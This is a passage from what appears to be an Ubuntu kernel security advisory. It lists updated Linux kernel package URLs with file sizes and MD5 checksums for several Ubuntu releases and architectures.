http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    83682 bcafd92384fdae95293c310f83443303
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   108840 2254f5416b8a0cd8d1cd52a57d7a064a

sparc architecture (Sun SPARC/UltraSPARC):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    59570 0a8a1c6f109f6620c74d81880a6836ef
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    71732 e29b3839ae80a5cc8b8ca1756569e0bb
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    42454 35c72663f93201098e40f0fc36232ccc
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    91776 d7f14f387c9d325ba87761a2da581b5c
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   587190 a4606a71370a3dec9dc6a3aba35ec115
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   171076 2f15afec1e2aa78035659ac46b010cb3
http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    22356 aa2c6396604a45f318881df2e562f625
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    46058 5633652b0f71f9e2098ce2798e29269f
http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   152976 d7cbf92b5ae85f379d0335c693ccc256
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:  2135270 f05d76791e5538fa887f7731d170dc58
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb
  Size/MD5:   565588 5d632e2a56604e4feff30e310f17f024
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb
  Size/MD5:   563928 4b591c5db77c0f5bc41ffff32a14ee31
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb
  Size/MD5: 14098262 0170c4f2c460270add65ba17eb7acfd0
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb
  Size/MD5: 13830862 e4b6c695ad5b3e4ad0b428947b4fd388
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_sparc.deb
  Size/MD5:   752654 6e9b50c2f72a60edf4df6e51d5448cc7
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   270064 879ee6667df636551d565e10ae5162fd
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   190360 388a92b9849a34e99f6a3d2817ca9b05
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   263030 82e8bd5f9f922af935f6f787942f4b2f
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:  1386520 98436d21f7255a6c923b50900bd2de4d
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   175444 37239b1899dd449d5b4985163c46d678
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   122106 1b86f75278b7fab22bbffd2c0010eef5
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    40398 81325db98acd64573c100455f0cb5289
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    48060 dd1b8744fcecf5959d2dac4a23b8cd34
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:     8698 a2a5a2941546e0137d8c57a38ba9ab2f
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    60516 08d388a60ac9be5c7d80d479f94fd4aa
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   106838 b350cddddb73537859dce8203c49ac1d
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:  1002034 0756e59f467bdefbc26dcb06a6201457
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:     9518 7bf2df83ac5364fef90bf13ea616e7e3
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   391514 9e98f9f4757387d261d6c7a1e8c7d61d
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    75924 b375f2838ce3f024a9f2b58d02f9d98e

Updated packages for Ubuntu 8.10:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.diff.gz
  Size/MD5:  3279295 99a1653c9f3eb96475ee9776faff3701
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.dsc
  Size/MD5:     2761 3b7c2f9d1b970a69db9a1c2c2bd5d95c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27.orig.tar.gz
  Size/MD5: 63721466 482b04f680ce6676114ccfaaf8f66a55

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.27_2.6.27-17.45_all.deb
  Size/MD5:  3492310 1dbaf1873425d41dfce3b359fc95728e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17_2.6.27-17.45_all.deb
  Size/MD5:  5906568 e4cb3deaf39ad7c3917d33f0f1082a40
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.27_2.6.27-17.45_all.deb
  Size/MD5: 52050112 2852d57c251b525e97d6ba66a94f1be5

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    36530 ae958becd299698d5f30f722eb07cde7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   265218 1de0174009daaf9e0d3fb8f8e737fa40
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    53438 46087922e5b4128b6a5f52dcacfbf840
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    43030 e25c2b8fbd4f46654a1ebc6089ef31bc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    52344 4c16a22c0fe8f2a967f1503953ed5f8c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    89844 4cc23c275cc1fd6621ac977881b91345
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    38180 24f5566a9c89334d394fb48d7c3d4949
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   677070 84220f4d0562b59edd2f0865120d4494
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   158618 edbaf560c5847b8f520ad94cd3f8d2d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    46346 90f299bb91f23a67e0811ae8e0472e70
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   154240 3ccfee605d2ef5a5e87aeb71320b337b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   313106 896f96e4eb01ff9381aaa78b6e1dc72d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:  2604320 b50756ed8aeeee4a72873b8c60df10b6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_amd64.deb
  Size/MD5:   663304 ef966b97630e8096fcf279d6c43b3960
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_amd64.deb
  Size/MD5:   662184 599a4bf3bad78733d35ad1b4a5601a25
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_amd64.deb
  Size/MD5: 23073032 96da11b5c1a75a1694b4047c1a71b091
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_amd64.deb
  Size/MD5: 23071096 162a682066d9c7d90df92c975698b2cd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_amd64.deb
  Size/MD5: 10479836 39042ef6e7f9049837b4d137450dc41a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_amd64.deb
  Size/MD5:   675844 3d711e518906ef37120bccabeaa1da2d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   434926 cc27207ed63847b17eab47e1978c98fd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   186500 940e6b351f4975369720543184596a04
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   275594 b525586af57630fd8b4e098cef404ad9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:  1810688 13f3abe5b38ff8a704c985dc8f3275b1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   151324 d883249df4fb86d6d9d1146db5fa1020
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   194282 ee6a6162a8b0615e73a89978fcb9d172
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   168150 696ed64f02936c7200cc9a468302de40
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    36428 ff94b9ab68b2108fd9d1d2475c211725
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    83436 3dceac801e8b0405790e1a28c960183f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    71992 2b936af85a4eceb6312ad7ef93a18c88
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    23240 1d34a195f16d39f7895a2bf36281a6c8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:     9012 454b1c03d70fbf4a917ff2431b6b4f2b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    68544 cd2e39978716c3448e54d6862877957c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   110302 ecb1005946c139f2340aaee3e80cd152
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:  1276186 d93285c15892be57cfb76798c746f88d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    47602 d2039335dc8bb4104fbb473b5ada0d96
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    13480 5299f432e2db456a3e0743fd786c18f1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   393936 83cfaf207498b9a60d4e97cd21309095
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   200806 5dfbdf4ce61cbe469582c94509160a42
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    13614 c860448fa643364e8776a4947cff9714

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    33948 74da15b4b68dc6a03f2da65175b021bd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   244732 aee21df42a017731c52c53100cbf2f20
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    55398 f4d1c18a70aec1e3e39572c36318115c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    41206 42a8188a1ad868fa58aa779b31908d65
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    48698 7e06c0fbdb39f426e1259d35e8f1505e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    86942 49099dad48131ce191b10c154f096d6a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    34064 c8cf2cb88451687abb047df2faae44f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   675492 3e953f324652ef7a01f93aeaa2dc5e55
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   158402 aa593e2736e7b717ea8c561b1e11c27b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    43624 b2ca8774a7cf447123ea811781e80dbf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   145226 0fbb95dc0bc59baf91447250f19e7d45
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   302390 991c8e4ef2dda71d6deda5599129a768
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:  2436572 4b845d0a28c2b48ad0c29521bae3a0b1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_i386.deb
  Size/MD5:   645046 28f8ea5f653057c350d40feb64d68f2d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_i386.deb
  Size/MD5:   645340 a4d347f729beffbf9ff1701d21a5f9b2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_i386.deb
  Size/MD5: 23499764 59f3275c547e9f13f97eba55955725f4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_i386.deb
  Size/MD5: 23635906 c096ba5db0db8b87f67309a9e9c6ff5f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_i386.deb
  Size/MD5: 10117090 7e1648c7b3a3ab2606263ecb20683ba1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_i386.deb
  Size/MD5:   675850 3e91710602fec2d4aebafe62a6cdfe80
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   433078 d1439530f50069f41b4c30b010871b4f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   171298 68b786d8853574467c792efe3fa62ca5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   264104 3a49c641e4a146fdb634b298c51ca6e9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:  1994518 105c6b0fb8b650949da502f3fee2018d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   150964 dc4178cced6d9c1823d24b2204c15ae9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   184058 a25940b16b7022a52f7b8c78e164a908
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   157856 c628cef1c909819dab1fe2d812dffeba
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    34500 2ea55d8e77aa3065af30ff4d440c059d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    78286 6d0f7704cdff848dbbfbd5fe60cf0ca7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    86190 c7d8ec25c3d35ea8455e9cf7c1b4ec64
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    51332 79b56b5e7f79a17d45fb7c55f64954b3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:     8796 e571105caa3bed5fc3576928b03eff31
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    64316 bcb0f12340567e9db7a5dcc3549dcf0e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   102092 a2556a5171c52abe48ba423b008c6f13
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:  1450234 339572f5e579468fc438b1dd2cc2dcd3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    44520 68267a8c684d01c673d4b41bf5d4af69
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    12642 80e228567fcb814cd67e54aec6abdb41
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   373158 483599df2e1b6c82a688b413b74e5b91
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   189720 156d822da222b7fc8b887a4d1b3b7c31
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    12992 7232aad22eb02ec694fa0d41d367a69c

Updated packages for Ubuntu 9.04:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.diff.gz
  Size/MD5:  7350773 c09bf21927b9609694b39cdd55af21cf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.dsc
  Size/MD5:     3198 5ba9f01bd70b951901d1d1667b964b54
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28.orig.tar.gz
  Size/MD5: 66766084 062c29b626a55f09a65532538a6184d4

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.28_2.6.28-18.59_all.deb
  Size/MD5:  3636694 05fda32db7067b32c0fe593e1acf0533
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18_2.6.28-18.59_all.deb
  Size/MD5:  8701396 65f8df38ba832ad50c6486d22420efca
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.28_2.6.28-18.59_all.deb
  Size/MD5: 56998214 3d33148ef29824c1060e1f66b470c6c4

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   234600 929bceffa24f85104c08edf073ac1f0e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    44110 6d94c9d8ecfe3b4673d25cce1db2b95b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    43316 d895b0ad91a70c9381fd7e17650fab75
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    51116 da4c61dc01f5b5e8fb61cdf14bbbb40a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    90082 dad217572b5b07064b9e12b0062d16b4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    38016 5e886058b306b4937f5a4ebe22451db6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   521628 d9f3ffe45b307847935002619ac31ea0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   125818 6fbc3c76a739b91e01da41bd535f3791
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    58060 cc30f23edae38f46b0d56f621969fd62
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   312502 9a11c9f0f37fee6a92c59de9df5fca11
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:  3872142 cdc4640244b192a5970dfc3d3efe4d7e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_amd64.deb
  Size/MD5:   689228 bf7aedb2bbb365a73ed77a8976a2701e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_amd64.deb
  Size/MD5:   689122 80cfc63043a2d7231f86ef3e68f0a131
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_amd64.deb
  Size/MD5: 24344078 dca923a8044df0ba9c642d5f2b317867
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_amd64.deb
  Size/MD5: 24335914 ad5a4fe70b4555e9399f9a45b58459f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_amd64.deb
  Size/MD5: 10551276 b61ed90bb3d3f19f0d2e593c0e9f091a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_amd64.deb
  Size/MD5:   766282 f86ee0c95591ea10b578e848b6fdeb5f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   215170 7939440a8813110d952d86b49113e146
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   189496 f7495840a58b11f4ebfaad4d8cf203fe
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    29412 54845dbae313e98befcc172b5e87ac2c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   274480 e029f99b6550bd014f26c45997f76dcc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:  1933908 6fa450fb440effd7f4a1d643f5e80ab9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   163464 208a84b0506fcd9cadb25f1b7f9d26b7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   194828 596399bbfa9a92e3116c8f8d3a7d1391
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   152994 3cf4fb6614c5798cdcca7c8d7fd04a5b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    36486 b3cf4deb0dc4e11f095eb9bcf81546df
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:     5842 085134ad282a8b2580aa12a6ed64fd9e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    72152 5b6bf270db5279c7d79cbd5fca8e14f6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    22714 a01ded50b855c5ed0580072a2277b74a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
